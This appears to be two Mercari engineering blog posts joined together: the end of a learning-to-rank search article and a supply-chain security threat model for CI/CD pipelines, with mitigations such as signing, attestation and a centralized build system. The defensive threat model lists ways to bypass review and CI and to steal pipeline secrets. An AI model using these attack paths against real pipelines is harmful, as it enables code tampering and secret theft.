Recency boosting is particularly important and is incorporated in model training. It is defined as the time span between the item listing event and the search query. The reason we place so much importance on recency is that in a C2C marketplace, the item price is determined by the lister. Therefore, any item that is underpriced (and therefore an attractive purchase) attracts a lot of attention and will get sold quickly. Conversely, items that are not well priced tend to go unsold for long periods of time. In other words, newly listed items tend to contain good deals, and so our customers want to see them first.

In addition to recency boosting, the text of the query and item titles themselves are important to gain semantic understanding of the query and item. To this end, we tokenize both the query and item title, and learn text embeddings for a fixed length vocabulary of words in our training data. These text embeddings are averaged over a particular query or item title, and the aggregate embedding is passed to the model as an input feature.

Neural networks are susceptible to the scale of their inputs. We opted to normalize our inputs to log-space (specifically, log1p [6]). Many of our inputs such as price and freshness follow a skewed long-tailed distribution, and we found empirically that optimizing the network on log inputs helped to stabilize training and improve the overall performance by reducing the impact of outlier values in our data.

Challenge 5: “Show me the money” ©

When applying re-ranking to the search results, we must be also mindful of the business domain of the application when assessing the accuracy of the re-ranking. Often, relying purely on the statistically significant improvement in metrics like nDCG or CTR (click-through rate) may not necessarily translate to business value. In other words, re-ranking problems in an e-commerce business domain are tricky because we need to ensure that improvement in search relevancy must also be tied to the business KPIs, while also providing a better end-user experience.

A common business goal is to increase sales, so revenue at first seems like an obvious metric. But revenue is not typically a good metric, because its high variance makes it difficult to detect statistically significant changes. Instead, for our re-ranking efforts, we focused on buyer metrics with lower variance such as Average Transactions per User and Buyer Conversion Rate (ATPU/BCR). Specifically, ATPU just looks at the average number of transactions per active user. It has lower variance, because unlike revenue, the impact of price differences is removed. Thus, detecting statistically significant changes is more feasible.

BCR goes further than ATPU by just looking at how many active users actually bought anything, thus removing the variance that comes from heavy vs. light buyers. This is even easier to use than ATPU for measuring statistical significance. In the end, ATPU/BCR are leading indicators of our sales performance, and they show how many users get value out of our service.

Our takeaways

1. Invest your time in quality label defining strategy

When we started labeling the data, we tried to better understand and define the specifics of our business case – what does the model need to accomplish. First, we started small and simple by experimenting with binary (item clicked or not) labels. Unfortunately, this has not been an informative enough signal that the model could learn from, and thus we could not observe increases in nDCG that translated to improved business KPIs. As we kept iterating and hypothesizing how our training data needed to be labeled, the user-item engagement journey that we have built helped us to define a much stronger label with a much more rich context for the model.

2. Keep your eye on nDCG’s “blind” side

The quality of a ranking is commonly evaluated using ranking metrics, e.g., the normalized discounted cumulative gain (nDCG). What it means is that an LTR model often is trained with an nDCG loss, which means that the model attempts to maximize nDCG when learning to rank the results on the training dataset.

The accuracy of the reranking LTR model (i.e.: the 2nd phase which does post-retrieval processing of the search results) hugely depends on how well the 1st phase (retrieval of the search results) performs. If we get bad matches from the index, even when a model maximizes nDCG and it seems that the model performs well, from the users’ perspective we are still providing a poor search experience, because we keep re-ranking bad results — as it pertains to the user!

3. Clean your data

Along our journey to develop a successful ranking model, we ran into problems with our data time and time again. The biggest issues we faced were:

The presence of extreme outliers. For example, some people list items for the maximum allowed price of 9,999,999 yen! Another example is when the user searches for an uncommon item, resulting in items being retrieved that are very old (and thus the recency boosting score is extremely high) compared to most items on Mercari. Sudden appearances of extreme feature values causes instability in gradient-based learning methods, and so we resorted to both excluding these outlier data, along with robust normalization choices.
We found that for re-ranking, not all clicks are created equally. From looking at our client logs, we found that some users have a tendency to examine a majority of the items shown to them. In the extreme, we found cases where the users tap on basically everything in the search result. Obviously, this does not generate a good relevance label for machine learning. We also found evidence of bot-like behavior, where users were sending the same query every few seconds, all day every day.

The key takeaway here is, you need to curate a data sample that represents genuine user intent, otherwise your ability to train, and indeed evaluate, a model will become difficult. A model evaluation using noisy data will not tell you anything about your model.

Closing thoughts

We still have a range of interesting problems to address in the context of application of Learning-to-Rank techniques:

Leveraging IPS (inverse propensity scoring), first introduced by Wang et al. (2016)[4] to address user click bias, which contributes to selection & training biases
Leveraging additional interaction signals which will improve personalization of search results even more
Experimenting with exponentially decaying graded relevance labels
Exploring embeddings-based approaches for reranking and dense-vector retrieval.

Tune in to future posts and join us on our ML journey as we tackle these problems, learn, and grow!

References

Liu, T.. (2009). Rank learning for information retrieval. Foundations and Trends. Information Retrieval. 3. 225-331.
Lefortier, P. Serdyukov, and M. de Rijke. Online exploration for detecting shifts in fresh intent. In CIKM 2014: 23rd ACM Conference on Information and Knowledge Management. ACM, November 2014.
Sanderson, Mark. (2010). Test Collection Based Evaluation of Information Retrieval Systems. Foundations and Trends in Information Retrieval. 4. 247-375. 10.1561/1500000009.
Wang, M. Bendersky, D. Metzler, and M. Najork. Learning to rank with selection bias in personal search. In Proceedings of the 39th International ACM SIGIR conference on Research and Development in Information Retrieval, pages 115–124. ACM, 2016.
Tao Qin, Tie-Yan Liu, Hang Li. A General Approximation Framework for Direct Optimization of Information Retrieval Measures. October, 2008
Wang, M. Bendersky, et. al, (2019). TF-Ranking: Scalable TensorFlow Library for Learning-to-Rank. 2970-2978. 10.1145/3292500.3330677.

Supply-Chain Security: Evaluation of Threats and Mitigations

Mon, 26 Dec 2022 17:00:02 GMT

This article is a translation of the Japanese article published on December 15th, 2022.

Abstract

This blog details our research into attacks and mitigations related to supply chain security, and more practical applications of supply chain security. In our research, we took an approach that leveraged a more concretely defined pipeline model than existing frameworks currently in use.
We examined the effectiveness of each countermeasure related to supply chain security based on the premise that "the point of attack injection does not necessarily coincide with the point of execution". In particular, we clarified the limited effectiveness of recently trending countermeasures such as a software bill of materials (SBOM) which are often adopted without much thought given to their actual efficacy as a solution.
Based on the results of our threat modeling, we proposed the need for a centralized CI pipeline that takes care of operations related to supply chain security through a single point of entry. A centralized CI pipeline can better enforce security requirements to developers, and replace pipelines where responsibility for security ends up delegated to the individual　developers of each component in the pipeline.

I’m Hashimoto Wataru (@smallkirby), an intern working in Mercari’s Security Engineering Team.
In this blog post, I’ll be talking about the main topic of my internship at Mercari—supply chain security. Modern software services use many automated processes (CI/CD pipelines). These processes are continuously triggered throughout the development process all the way from developers writing code, to when the software itself is actually built, released, and deployed. These processes are built upon many dependencies both internal and external. Due to these dependencies, supply chain attacks can both directly and indirectly target each step of the pipeline. The number of supply chain attacks has been increasing every year, and the severity and impact of these types of attacks is becoming greater.

Mercari uses a large number of services and various CI/CD tools that have many dependencies, and is by no means immune to these kinds of attacks.
In April 2021, [Mercari was directly affected](https://about.mercari.com/en/press/news/ articles/20210521_incident_report/) by such an incident due to the compromise of an external code coverage tool included in our CI/CD pipeline. As a result of this incident, we decided to review the security risks related to our supply chain and improve security measures in this area.

Review and re-evaluation of supply chain

In response to these threats, various communities have proposed frameworks that summarize the requirements for securing the supply chain. Some well-known examples include SLSA which was launched by members from Google and the Linux Foundation, and the CIS Software Supply Chain Security Guide which was jointly published by Aqua Security and CIS. These requirements can be applied at each stage of the CI/CD model that many companies have adopted. SLSA in particular categorizes requirements in four security levels that can be applied step-by-step to products.

However, since these frameworks are relatively new, there has been little accumulating experience applying them to production environments. For example, SLSA is currently in alpha status and needs more discussion in regards to some requirements.

In order to apply these frameworks to improve Mercari’s supply chain security, we need to evaluate the following points:

Whether the CI/CD pipeline model assumed in SLSA and others is applicable to Mercari’s pipeline
Whether these frameworks enumerate all possible attack methods, and if the proposed requirements can prevent all possible attack methods or not.
How can these requirements be applied to the pipeline.

In particular, it is important to evaluate which policies can act as a defense against which type of attacks.
If you simply rely on a framework such as SLSA or CIS, you may misunderstand which requirements are effective and to what extent against which attacks. You might assume that any given countermeasure can be a silver bullet, but with supply chain security that is far from the case and no single control can provide complete effectiveness for the entire supply-chain. We need to understand the countermeasures, since each countermeasure is just an individual component of what should be part of a multi-layered security approach. We believe that it is necessary to first identify all possible attacks, and then to identify what a given countermeasure can and can’t do against these attacks, as well as the scope and extent of its effectiveness.

In this blog, we will first reassess the attack methods in each component of CI/CD. Then, we will re-evaluate mitigations against these attacks. Finally, we will provide an example design of a centralized CI pipeline, which adopts these mitigations and separates their management from the developers.

Model of modern typical CI/CD pipeline

Here is a recent example of a typical CI/CD pipeline where DevOps has been widely adopted:

In this model, GitHub is used as a code repository, GitHub Actions is used as a CI phase, GCR(Google Container Registry) as container registry and ArgoCD running on Kubernetes (GKE etc.) as a CD environment. However, the software used in the figure is just an example. The following threat model and mitigation would apply to almost all components, even if you use different software (e.g. GitLab for the code repository, CircleCI for the CI phase, etc).

Attack injection point versus attack execution point

In the following chapter we will summarize the available attack methods in the threat model and their respective mitigations. As a note, indexes such as [A] in the figure are identifiers of components in the pipeline, and we will group attack methods and mitigations by these components.

A supply chain consists of many components, so the point where malicious code is injected and the point where it is executed are not always the same.
For example, suppose that an attacker steals credentials to write to Container Registry and pushes a malicious image from outside the pipeline. In this case the injection point would be Container Registry, and the execution point is the Kubernetes cluster, where the image is deployed to.

As defending against supply chain attacks should be multi-layered in nature, it is important to not only detect attacks at the injection point, but also to detect attacks while the process is still in-flight and to make sure attacks are not present in the final artifact created by the pipeline. In the description that follows, we will point out the points of injection and execution, as well as ways to both to avoid attack injection and to trace the attacks themselves.

Supply chain attacks and mitigations

We summarized a threat model in this PDF for each component in the pipeline model described above. In the following section we will discuss the details of notable attack methods and mitigations.

Summary of threat model

In the following sections, we will focus on notable attacks and mitigations. Each attack method is grouped by its related component in the pipeline model. Note that the following components are just an overview, and the details are described in this PDF.

CLICK to show the summary of the threat model:

The following threat model assumes a typical modern development flow. For example, it assumes that the source code is managed by a SCM, and CI is not run on the developer’s terminal but in an ephemeral environment such as GitHub Actions.

A. Source repository (Commits)

This is the phase between when developers write the source code and when they push it to the source code repository. Note that this is used in both the CI phase (the software code itself) and the CD phase (Kubernetes manifests):

1. An attacker pushes a malicious commit to a feature branch

An attacker compromises an SSH key, a GitHub account, or a developer’s machine and pushes one or more malicious commits to a feature branch.

2. An attacker pushes a malicious commit to the main branch

An attacker compromises an SSH key, a GitHub account, or a developer’s machine and pushes one or more malicious commits to the main branch. This can be done if there are no Branch Protection Rules for the main branch, or if the attacker compromises an account with Admin privileges.

3. Scan of an old repository or branch

An attacker uses stolen tokens with read access to scan old repositories or branches. This can be a threat if the security configurations for the branch or repository are misconfigured, if it contains sensitive information or if the repository has been abandoned but still affects the production environment.

B. Source repository (Review)

This is the phase between when PRs are created and when they are merged to the main branch. Note that compromise of the SCM platform itself is out of the scope of this blog post:

1. Self-Approval by an attacker

An attacker approves their own PRs to bypass the review requirement. Note that GitHub does not allow the PR author to approve their own PR.

2. Approval by compromised accounts

An attacker approves PRs using compromised accounts. Note that GitHub requires the approver to be someone other than the user who created the PR. However, if the attacker is an insider, they can achieve the attack by compromising only one account.

3. Additional commits to approved PRs

An attacker opens a PR with legitimate changes, and gets it approved by a legitimate reviewer. Then, the attacker pushes one or more malicious commits to the approved PR. If the repository doesn’t enable “Dismiss stale pull request approvals when new commits are pushed” in the branch protection rules settings, the attacker can bypass the review requirement.

4. Hidden Backdoor (hard-to-find bug)

An attacker pushes changes that appear to be legitimate but contain a bug that can be exploited when specific conditions are met. If reviewers cannot identify the bug, the changes are approved and merged to the main branch. This is similar to the Hypocrite Commit in the Linux Kernel. Also, this can be applied to automatically generated code (e.g. gRPC blob code, package.lock) that is hard to review.

5. Abusing the review bypass mechanism of the platform

If the SCM platform allows bypassing the review requirement under certain conditions, an attacker can merge malicious code to the main branch while bypassing review requirements.

6. Abusing a bot/app account

If bot/app accounts perform operations on a PR, an attacker may bypass review requirements by abusing the behavior of the bot/app. For example, an app that automatically approves PRs for small changes (e.g. adding documents or fixing typos) can be abused.

7. Changes to review requirements by compromising an Admin account

An attacker compromises an admin account and changes Branch Protection Rules settings to bypass review requirements and merge changes.

C. CI (test, build, CI toolings)

These are the components in the CI phase (like GitHub Actions) on feature/main branches. Note that attacks against the GitHub Actions Runner itself are out of this blog’s scope:

1. Malicious changes on code abusing CI tools

If CI tools such as linters have write access to a repository, and if the commit by the tools do not require review, an attacker can inject malicious code by abusing the CI tools.

2. Use of unintended references

If the CI phase uses external resources as dependencies, and if the reference is mutable (e.g. the reference can be changed by input values), an attacker can use malicious references in Github Actions. Also, the attacker can abuse the Repository Redirection feature of GitHub to make a process access deleted repositories, that have been hijacked by the attacker.

3. Execution of modified GitHub Actions

When a PR modifies the Github Actions workflow file (/.github/workflows/*.yml), the modified workflow file is used to run GitHub Actions on that branch. If the feature branch has been granted inappropriate Secrets or permissions, an attacker can run arbitrary processes by abusing those permissions.

4. Bypassing CI

When static tests are performed in the CI, an attacker can bypass the CI by abusing the special conditions of the SCM platform. For example, in GitHub, the attacker can include [skip ci] in the commit message or include a paths condition in the GitHub Actions workflow file.

5. Malicious inputs for GitHub Actions

GitHub Actions can take branch names, PR comments, etc. as input values. Also, it is possible to call the Git CLI in a Github Actions workflow and get more input values. An attacker could abuse the input values to use unintended references or run malicious processes.

6. Modification of test code

Suppose that the CI phase communicates with external services(e.g. E2E testing using a Cloud Database). In this case, an attacker can push malicious code to the test files to attack related external services or steal secrets.

7. Interaction between CI steps

GitHub Actions runs jobs in parallel, and steps in sequence. If one step passes the result to the next step, an attacker can modify the result and take control of the next step to compromise following steps. Also, if jobs running in parallel can interact with each other, the attacker can control other jobs by abusing the job that is compromised by the attacker.

D. Secrets and dependencies

A phase where dependencies and secrets are used in CI:

1. Theft of environment variables by CI tools

In GitHub Actions you can set a secret and use it as an environment variable within individual steps. If a CI tool (e.g. Linter, Code coverage tool) is compromised, the attacker can steal these secrets. This is similar to the Codecov incident. The risk would be higher if you use same secrets on all branches, and not an OIDC token nor useEnvironments.

2. Secrets with excessive permissions

Suppose that a CI process on a feature branch is granted permissions for the production environment. In this case, an attacker can modify the CI workflow file to use the production environment’s secrets to run malicious processes on production from that feature branch.

3. Use of compromised dependencies

An attacker compromises dependencies and injects malicious code into them, to run malicious processes during the CI phase. The following are some of the patterns that can be used to inject malicious code:

The attacker compromises the server which distributes artifacts (e.g. base container image, build-time dependencies) and distributes malicious artifacts. If the artifacts are attached with hash values and the hash values can be tampered, the attacker can tamper the hash values to make hash value verification impossible.
The attacker pushes malicious changes to the source repository of the dependency, and malicious code is built from the artifact. This cannot be prevented by hash verification.
The attacker injects malicious code to a transitive dependency instead of a direct dependency, This cannot be prevented by hash verification.
The legitimate dependency owner suddenly turns malicious and injects malicious code to the dependency and builds and publishes the artifact. This is similar to the colors.js and faker.js incident. This cannot be prevented by hash verification.

4. Use of unintended dependencies

An attacker modifies references to dependencies or CI tools to use unintended dependencies.

5. Confidential and sensitive information in the container layers

If secrets are stored in the container layers of artifacts, an attacker can exfiltrate them. In Google Cloud Build, all the files in the workspace are included in the artifact unless they are explicitly specified in .gitignore or .gcloudignore, so it is possible that sensitive information can be included in the build.

E. Container registry(OCI Registry)

This is the phase where the artifacts are pushed to and stored in the Container registry.

1. Pushes to a production registry from a feature branch

If the CI process on a feature branch is granted permissions for the production environment, an attacker can push malicious artifacts to the production registry by modifying the Actions workflow file. Suppose that the CI uses Identity Federation with OIDC to access the registry. If OpenID Connect (e.g. GCP’s Workload Identity) is not configured properly, then the attacker can push malicious images from a CI process on an unintended branch.

2. Pushes of unintended images

If an attacker modifies the Actions workflow file to tamper the build flow, the attacker can push malicious images built in unintended build flow to the registry.

3. Overwrite images in an Container registry using compromised accounts

An attacker can push a malicious image to the registry using a compromised account. The malicious image can be deployed to production during the CD phase.

F. CD process

This is the phase between when the Kubernetes manifests are updated and when they are applied by CD tools such as ArgoCD. This phase heavily depends on the type of software used in the CD pipeline, so we will only introduce a general Threat Model. Note that the changes to the manifests are the same as “A. Source Repository (commit)” and “B. Source Repository (review)”:

1. Malicious sync request using a compromised Webhook

If ArgoCD is configured to not poll for the manifest repository and to use aexplicit Webhook to sync manifests, an attacker can send malicious sync requests using the stolen Webhook secret. If there is no restriction on the branch or tag to sync, the attacker can sync arbitrary versions.

2. Apply manifests to other services in the cluster

If the manifest repository is a monorepo that manages multiple services, an attacker can modify the configuration of other services by modifying the manifests of one service. This can happen when ArgoCD has strong permissions for all services and does not properly impersonate service accounts when deploying. Also, if the repository is not well configured, the attacker can modify the manifests of other services on the source repository.

3. Pull of unintended images

An attacker can modify the image in Kubernetes manifests to make the Kubernetes pull unintended images.

4. Direct operation on Kubernetes using compromised accounts/secrets

An attacker can compromise an admin account to deploy arbitrary services regardless of manifests in the repository.

(The End of Attack Methods)

Summary of Mitigations

For the details of mitigations for each attack method, please refer to this PDF. We list possible mitigations for each attack from the following viewpoints:

Prevention
- Injection Prevention: which prevents malicious code being injected into the pipeline
- Execution Prevention: which prevents the malicious code being executed
- Impact Reduction: which prevents additional impact after the malicious code has been executed
Detection: which detects incidents
Traceability: which tracks the information of components and dependencies in the pipeline

This classification of a mitigation is based on the premise that each individual mitigation does not guarantee "complete" security of the "entire" supply chain. Each mitigation only has a limited effective scope, as described in the "Attack injection point versus attack execution point" section. Only by explicitly identifying which mitigations are effective and in what scope can we determine security requirements that can be applied in practice.

Notable mitigations

In this chapter, we will summarize mitigations against the attack methods by category and introduce their characteristics, what they can do, and the status of related tools.

Attack methods can be roughly classified into two categories:

Those that compromise and abuse accounts and tokens.
Those that infiltrate the supply chain by compromising and abusing dependencies.

Many of the mitigations listed below attempt to prevent possible attack execution at the end by ensuring that "the final artifact is the result of following the intended pipeline flow". On the other hand, it is difficult to completely prevent dependency injection, which makes the aspect of “traceability” more important for mitigating against this type of attacks.

Although "attack injection points and execution points can be different" is not emphasized in existing frameworks, it is considered essential to accurately understand the position and effectiveness of each mitigation in order to prepare appropriate mitigations. We hope that you will read the following section while keeping in mind how each of the mitigations are effective against either the injection of the attack or preventing the attacks execution.

Source Repository

The biggest challenge in source code repositories is preventing malicious code from being injected into the repository. This is not limited to public repositories such as OSS, but also applies to private repositories within the company, and it is also necessary to consider attacks from insiders.
In principle, in order for an attacker to push malicious code to a repository, it is necessary to first hijack a developer’s machine, their account, or some kind of key/token. Here are some mitigations to prevent an unauthorized push to a repository:

Enforcement of Two Factor Authentication (2FA)
Appropriate configuration of Branch Protection Rules, and enforcing the rules for all accounts, including admins
Limit the number of admin users
Enforce commit signing
Monitor and delete inactive users

If you want to be more restrictive you can also consider network restrictions such as an IP address restriction on the repository. As for 2FA, Branch Protection Rules, and commit signing, you can enforce them by configuring the relevant GitHub settings. For commit signing, you can use Gitsign, which uses a GitHub OIDC token for keyless signing.

Additional mitigations include code reviews in the repository. An Attacker will try to bypass the review itself to inject malicious code. Mitigations for these include the following:

Enforcement of Two Person Review (branch protection rule / CODEOWNERS)
Enforcement of Two Factor Authentication (2FA)

One common emphasis in frameworks such as SLSA and CIS is the Two Person Review. You can also configure the repository so that any approval is invalidated if you push additional changes after getting approval. However, this also has an impact on development speed.

Secrets

The CI phase may have secrets such as GITHUB_TOKEN for CI tools to operate on the repository, or secrets for pushing images to container registries or for interacting with other external services. When using static keys, the following points should be noted:

The principle of least privilege
Limit the number/access scope of steps which can use secrets
General mitigations such as the rotation of keys or using short-lived keys(Keyless)
Network restrictions

In the case of GitHub Actions, the scope of the secret can be configured on a step-by-step basis. However, if a feature branch is attacked and the Github Actions are tampered, those secrets can be exfiltrated by an attacker. In this case, you can use an Environment Secret to limit the secrets that can be used for each branch. You can also configure secrets to require a review by specific reviewers when a Github Actions is changed to use a certain secret.
Using OIDC instead of static secrets can reduce the risk of key leakage. In GitHub, you can access external services such as GCP and AWS with OIDC tokens, and you can make requests to issue a token which is valid only for the duration of the Job.

If you want a stricter policy, you can also consider using egress network restrictions:

In the above figure, all necessary dependencies are installed before the build, and then no network access is allowed during the build. After the build, network access is again allowed when pushing the image to the container registry. This way, we can prevent malicious code (e.g., modified build.rs) from injecting dependencies or leaking build information to the outside, even if it runs during the build process. This can be extended to subsequent steps for testing and running other CI tools. Network restrictions (or allowlisting) in the following steps can reduce the risk of leaking secrets during execution. However, this would be difficult to apply in practice. In fact, it is not possible to restrict the network for each step/job in normal GitHub Actions. If you use self-hosted GitHub Actions on Kubernetes, you can consider using Istio to accomplish this.

Signing

Signature verification is one of the most fundamental and important elements in preventing the execution of attacks in supply chain security. By signing an artifact during the CI phase and verifying the signature when pulling the image from a container registry, it is guaranteed that the entity that signed (i.e., built the artifact) is a trusted entity. If an attacker directly pushes a malicious image to the container registry, the signature of that image will not exist, and the signature verification will fail at deployment, preventing the deployment of malicious images.

The challenge here is key management. Key management is a very cumbersome process and if possible we would prefer not to do. Sigstore’s cosign can be used for this purpose. Cosign allows you to authenticate using OIDC tokens from Google, GitHub, etc, and sign using a keyless approach. Public and private keys are generated, but the keypair is ephemeral, and the public key can be stored in an Container registry or a Transparency Log managed by Rekor, so there is no need to manage them.

However, due to the public nature of Transparency Logs, which can be viewed by anyone and cannot be deleted or tampered with, it is necessary to set up a private Rekor instance within the organization if you do not want to make your internal activities public. When using a private key management service such as GCP KMS, you can grant permission to use the key for each service or branch by properly configuring Workload Identity. In both cases, you must ensure that only authorized build environments should have access to signing keys.

Verification of Signing

Signing is useless until it is verified at the time of deployment. The cluster must check if the image to be deployed is signed by a trusted entity. If not, the cluster should stop the deployment. One way to implement this is to include an image verification phase in the middle of the CD pipeline, or to use an Admission Controller from Kubernetes to include the verification process.
In the latter case, you can use Sigstore’s Policy Controller. The Policy Controller can define a "policy" which requires that a particular (or all) image(s) must be signed. It can stop the deployment or emit warnings when images violate these policies. By using this kind of tool at the time of deployment, you can verify that the image was pushed from a trusted build environment, and even if a malicious image is pushed to the container registry at some point in the pipeline, it can be prevented from being deployed.

It should be noted that the signature only guarantees that "the image being pulled by Kubernetes is the same one that was built and pushed by a legitimate build environment that has access to the signing key", and does not guarantee at all that the build process itself was executed as intended or that there are no vulnerabilities in the dependencies.

Dependency Tracking

All software depends on third-party packages. It is very difficult to guarantee the security of all the dependencies, and it is therefore very difficult to completely prevent the injection of malicious code when using many dependencies. Therefore, the important point here is to appropriately track dependencies (Traceability).

SBOM (Software Bill of Materials), a trending topic in recent years, is also expected to have some effect in terms of traceability in supply chain security. In the case of JavaScript or Go applications, the files package.lock or go.sum in the source code repository can be used to list the dependencies of the application itself without an SBOM. However, the SBOM differs from these in several ways.

First, it is possible to manage packages in a unified manner even when different package managers are used for different services. This is because an SBOM is not a package-manager-specific format, but a standardized format. In addition, since a given container image is often based on another base image, the base image’s SBOM information can be integrated and included in the final dependency list, if it’s available. If the dependencies including the base image can be explicitly managed in this way, identifying and taking measures against an image with vulnerabilities will be easier.

Generating an SBOM

Tools to generate an SBOM seem to be still in development. Currently available tools include ko developed by Google as CNCF sandbox project, and apko developed by Chainguard. ko automatically generates an SBOM for Go applications, while apko can create distroless(-like) container images with an SBOM for any language binaries that have already been built. Trivy, a well known container scanner, also has an option to generate an SBOM.
The SBOM is generated during the CI phase, and then can be pushed to Container registries along with the container images. You can also use cosign to push and sign an SBOM.

The Limitations of an SBOM

First of all, an SBOM is classified as a traceability element in the above-mentioned categories of mitigations. Hence, it cannot be expected to have a significant preventive effect against the injection of vulnerabilities. In combination with attestation (described below), it would be possible to define some policies for the packages listed in an SBOM and to prohibit the usage of dependencies from certain origins. However, it would be basically used to search the list of images that use the dependencies in a unified manner when vulnerabilities are newly found in them.

It should also be noted that, in the first place, there are files that cannot be tracked by an SBOM. When creating an SBOM for container images or when scanning them, the database of the standard package manager used in the operating system is consulted. In the case of single app containers such as Go apps, those DBs can be combined with files such as go.mod to generate a container-wide SBOM. However, if dependencies are installed using commands such as curl or wget in the Dockerfile, it is difficult to track them using an SBOM. In order to get transparency of dependencies all the way back to the base image, we need a way to track such "hidden" packages, but we aren’t aware of any practical tools that can currently do this.

Additionally, even if you can track dependencies with an SBOM, it is another story whether you can evaluate if the dependencies are legitimate or not. Of course, you can verify the signature or attestations of the dependencies using tools such as Cosign and Rekor to ensure that the legitimate builder built the artifact. However, it is not realistic to require all dependencies to follow such a secure flow. When following the root of a dependent package, there will almost always be packages that do not meet the security requirements. It is currently still very difficult to guarantee the validity of such dependencies, but we conclude this section with a list of possible candidates:

Assured OSS, Google: List of OSS which are continuously built and fuzzed in Google’s secure pipeline. As of August 2022, it provides 250 packages.
Wolfi, Chainguard: which provides distro-less base images providing an SBOM.
Security Scorecards, OpenSSF: which scores open source repositories based on security requirements.

Attestation

As mentioned in the "Signing" section, signing itself only guarantees that "the image pulled by Kubernetes has been pushed by a build environment with legitimate access to the signing key". Attestation can be used to tell the consumer/verifier how the image was built, what arguments were passed, and what information it contains.

Attestation is generated separately from the image at build time and (in general) is pushed to a Container registry along with container images. The standard format of attestation/provenance is still under development, but the in-toto format is widely known for now. Attestation identifies the image to be attested by its subject. By attaching an attestation to an image, it is possible to describe how the artifact was created. These attestations can also be signed to ensure that the build environment with legitimate access to the signing key has claimed to have built the image in the flow described in the attestation.

Contents in Attestation

The content that can be included in an attestation is vast and can contain practically anything. For example, an attestation can have an SBOM using Cosign:

$ cosign attach sbom –k8s-keychain –sbom $SBOM $IMAGE

It is also possible to attach the result of a container vulnerability scan. Cosign defines a Generic Predicate Specification as a predicate type other than in-toto format. One of them is the vuln predicate type, which describes the scan result. It is easy to attach the scan result generated by Trivy as an attestation to the image:

$ cosign attest --key gcpkms:// --type vuln --predicate trivy.vuln.json $IMAGE

Additionally, you can attach any information you want to the image by using a custom predicate type.

When you attach multiple attestations to an image, each attestation is represented as a layer, and each layer can have a different type and format.

Verification of Attestations

Once an attestation has been created, you can validate the contents of the attestation in the same way as the "Signing" section. Cosign itself has a mechanism that can validate an attestation (This refers to semantic validation of what the attestation says, not validation of the attestation’s signature). Rules can be written in CUE or Rego.

It is also possible to validate the policy with Kubernetes’s Admission Controller during deployment using Policy Controller as described above. As an example, a rule that ensures that an image is signed with a key managed by a specified KMS and that a container scanned by Trivy shows no third-party dependencies vulnerable to CVSS 8.0 or higher, can be written as follows:

apiVersion: policy.sigstore.dev/v1beta1
kind: ClusterImagePolicy
metadata:
  name: trivy-scan
spec:
  images:
    - glob: gcr.io//simple-server*
  authorities:
    - name: gcp
      key:
        kms: >-
          gcpkms://<KEY>
      attestations:
        - name: cvss-less-than-8
          predicateType: vuln
          policy:
            type: cue
            data: |
              predicateType: "cosign.sigstore.dev/attestation/vuln/v1"
              predicate: {
                scanner: {
                  uri: =~ "pkg:github/aquasecurity/trivy@.*"
                }
              }

              #Vuln: {
                CVSS: {
                  nvd: {
                    V3Score: number & <8.0
                    ...
                  }
                }
              }
              result: {
                ArtifactType: "container_image";
                Results: [...{
                  Vulnerabilities: [...#Vuln]
                }]
              }

By combining an attestation and policy validation in this way, it is possible to enforce restrictions on the image build flow and dependencies when deploying. In addition to the above example, if an attestation can contain the information about the Two Person Review and commit signing in GitHub, it may be possible to describe them as policies as well.

Example of a Centralized CI Pipeline

Even if you can build a CI pipeline that meets the above requirements, there are still challenges when operating it internally. That is, if multiple services/applications use their own build systems, it is difficult to enforce the recommended security requirements.

If each service builds its own application/container in GitHub Actions and pushes it to the registry, it is difficult to enforce the attestation format on each service. In the worst case scenario, developers of each service may be able to forge the attestation as if they met the policy by arbitrarily manipulating the attestation (the signature of the attestation is only a guarantee that the attestation was created by a legitimate build system, hence each service can legitimately create an arbitrary attestation).
Therefore, we can consider the following centralized and standardized build system for Go applications:

This pipeline uses Tekton Pipelines as a build system running on Kubernetes. It is probably possible to achieve this with (Self-hosted) GitHub Actions as well, but I chose Tekton as an example due to its compatibility with related toolings.

First, developers of each service perform static tests on the source code in GitHub Actions. However, we provide little to no secrets in each service repository. This reduces the attack surface and minimizes the risk of secret leakage in the case of security holes in areas where developers of each service can operate freely in GitHub Actions. After the test, a build request is sent to Tekton from GitHub. Tekton uses Interceptor to verify the issuer of the request.

After the verification of the request issuer, Tekton executes the tasks in units called Task. Each task has multiple steps, and each step runs in a separate isolated container.

In the first step of the task, all dependencies are downloaded. Then, if necessary, the network is completely (or partially) disconnected and the artifact is built and signed. Next, the container scanner is run against the built image, and the attestation for the result is generated and signed. If necessary, you can also create a custom attestation here. Finally, the generated artifact, attestation, SBOM, and signature are all pushed to the container registry.

It should be noted that Tekton Chains can automatically create an attestation in the in-toto format that meets the requirements of SLSA. Chains automatically detects the push of an image to the registry, and generates an attestation for the Task/Pipeline workflow, and signs it.

In the figure above, it uses a key managed by KMS to sign the image and the attestation, but it is also possible to use Fulcio+Rekor to perform keyless signing.

The above is just an example of a centralized CI pipeline. Of course, when actually implementing this, it is necessary to reconsider a variety of things: whether it covers all of the aforementioned threat models, whether it does not significantly damage developer experience, and whether there are any technical issues during operation. If the developer specifies the Dockerfile as the entry point for building, there is a problem that the operation (installation of dependencies, etc.) in the Dockerfile cannot be traced. Also, on the CD side, it is necessary to add a flow to properly verify the attestation and signatures generated by the CI pipeline described above.

However, the most important thing to emphasize here is the need to prepare an abstraction layer for the CI pipeline that is "Secure By Default" unless developers use it in unintended ways. The steps in the abstraction layer (e.g., generation of attestations and their contents) are secondary, and the abstracted environment itself is important. If necessary, we can add security requirements to the abstraction layer as needed to enforce all services to follow it.

Summary

In this blog, we enumerated various attack methods and mitigations against a concrete pipeline model in order to demonstrate that there is no single perfect measure to ensure supply chain security.

An SBOM is not a silver bullet, and an attestation does not provide an absolute guarantee. Each of these mitigations should be considered to be a single component in a multi-layered defense. That is why it is important to define the necessary requirements clearly and layer your defenses as much as possible. However, this area of research is in its early stages, there are still active discussions, requirements are being reviewed, and related tools are still under development. Therefore, it would be dangerous to blindly trust the proposed frameworks.

It is a necessary and meaningful process to take a fresh look at the pipeline we are using and rethink from the ground up what each of the proposed requirements can and cannot prevent, and how they can be applied and operated in the real world.

Various communities are conducting reviews of supply chain security from their own perspectives. It is our hope that they will complement each other and mutually improve upon each other’s missing perspectives and practicality.

Thank you for reading, if you have any comments or corrections regarding this blog, let us know.

Acknowledgments

This blog was written with the assistance of the Security Engineering team as a product of my security internship at Mercari. In particular, I’m grateful for the support of Hiroki Suezawa (@rung) who provided me with a lot of knowledge in many of the areas covered in this blog.
